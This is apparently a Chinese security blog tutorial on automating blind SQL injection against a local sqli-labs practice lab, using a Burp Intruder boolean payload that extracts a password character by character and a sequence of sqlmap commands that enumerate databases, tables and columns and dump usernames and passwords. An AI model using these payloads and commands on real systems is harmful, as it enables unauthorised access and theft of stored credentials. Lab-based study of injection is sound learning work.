当前位置:网站首页>【工具跑SQL盲注】
【工具跑SQL盲注】
2022-07-03 04:33:00 【黑色地带(崛起)】
目录
一、(工具)burp跑盲注
1.1、方法一:爆破
抓包之后,将请求发送到"Intruder"模块
设置2个有效载荷
1.2、方法二:注入语句爆破
注入构造语句,进行迭代操作
(select case when '§0§' = lower(substring((select password from employees where empid=1),§1§,1)) then 1 else 0 end)
二、(工具)sqlmap跑布尔盲注
2.1、命令:
-u 指定注入点
--dbs 跑库 名
--tables 跑表 名
--columns 跑字段 名
--dump 枚举数据
跑出对应的后,依次加上-D 指定库 -T 指定表 -C 指定字段
2.2、利用过程:
第一步:检测是否存在注入
基础操作
python sqlmap.py http://localhost:8080/sqli-labs-master/Less-5/?id=1 --batch
--batch是使用默认设置
其实环境都扫出来了
就可以再加上--dbms mysql了
第二步:爆数据库名
命令
#获取全部数据库
sqlmap.py -u url --dbs --batch
---------
#获取当前数据库
sqlmap.py -u url --current-dbs --batch
基础操作
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' --dbs --batch
第三步:爆数据库表名
命令
python sqlmap.py -u url -D DB --tables --batch
基础操作
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security --tables --batch
第四步:爆字段名
命令:
sqlmap.py -u url -D DB -T TBL --columns --batch
基础操作
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security -T users --columns --batch
第五步:爆数据
命令:
sqlmap.py -u url -D DB -T TBL -C "COL1,COL2" --dump --batch
基础操作:
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security -T users -C "username,password" --dump --batch
三、推荐
边栏推荐
- 解决bp中文乱码
- Hj35 serpentine matrix
- vulnhub HA: Natraj
- JS multidimensional array to one-dimensional array
- 消息队列(MQ)介绍
- Know that Chuangyu cloud monitoring - scanv Max update: Ecology OA unauthorized server request forgery and other two vulnerabilities can be detected
- Which code editor is easy to use? Code editing software recommendation
- 2022-02-14 (394. String decoding)
- Games101 Lesson 9 shading 3 Notes
- Leetcode simple question: check whether two string arrays are equal
猜你喜欢

Asp access teaching management system design finished product

JVM原理简介

I've been in software testing for 8 years and worked as a test leader for 3 years. I can also be a programmer if I'm not a professional

Know that Chuangyu cloud monitoring - scanv Max update: Ecology OA unauthorized server request forgery and other two vulnerabilities can be detected

Learning practice: comprehensive application of cycle and branch structure (I)

使用BENCHMARKSQL工具对kingbasees并发测试时kill掉主进程成功后存在子线程未及时关闭

redis 持久化原理

Internationalization and localization, dark mode and dark mode in compose
![[free completion] development of course guidance platform (source code +lunwen)](/img/14/7c1c822bda050a805fa7fc25b802a4.jpg)
[free completion] development of course guidance platform (source code +lunwen)
![[文献阅读] Sparsity in Deep Learning: Pruning and growth for efficient inference and training in NN](/img/7e/50fa6f65b5a4f0bb60909f57daff56.png)
[文献阅读] Sparsity in Deep Learning: Pruning and growth for efficient inference and training in NN
随机推荐
使用BENCHMARKSQL工具对KingbaseES预热数据时执行:select sys_prewarm(‘NDX_OORDER_2 ‘)报错
Basic types of data in TS
[set theory] binary relation (example of binary relation on a | binary relation on a)
After reviewing MySQL for a month, I was stunned when the interviewer of Alibaba asked me
4 years of experience to interview test development, 10 minutes to end, ask too
[set theory] inclusion exclusion principle (including examples of exclusion principle)
Web - Information Collection
After job hopping at the end of the year, I interviewed more than 30 companies in two weeks and finally landed
使用BENCHMARKSQL工具对kingbasees并发测试时kill掉主进程成功后存在子线程未及时关闭
AWS VPC
[BMZCTF-pwn] 20-secret_ file
Dive into deep learning - 2.1 data operation & Exercise
有道云笔记
Hj35 serpentine matrix
Classes in TS
Truncated sentences of leetcode simple questions
金仓数据库KingbaseES 插件kdb_database_link
Golang -- realize file transfer
Know that Chuangyu cloud monitoring - scanv Max update: Ecology OA unauthorized server request forgery and other two vulnerabilities can be detected
FuncS sh file not found when using the benchmarksql tool to test kingbases












